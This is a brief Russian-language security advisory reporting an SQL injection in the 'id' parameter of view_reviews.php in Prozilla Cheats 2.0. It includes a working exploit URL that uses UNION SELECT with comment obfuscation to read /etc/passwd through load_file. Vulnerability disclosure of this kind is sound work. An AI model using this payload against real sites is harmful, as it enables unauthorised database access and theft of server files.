Программа: Prozilla Cheats 2.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием view_reviews.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://www.example.com/view_reviews.php?id=-1/**/UNION/* */ALL/**/SELECT/**/1,2,load_file('/etc/passwd'),4,5,6,7,8,9/*
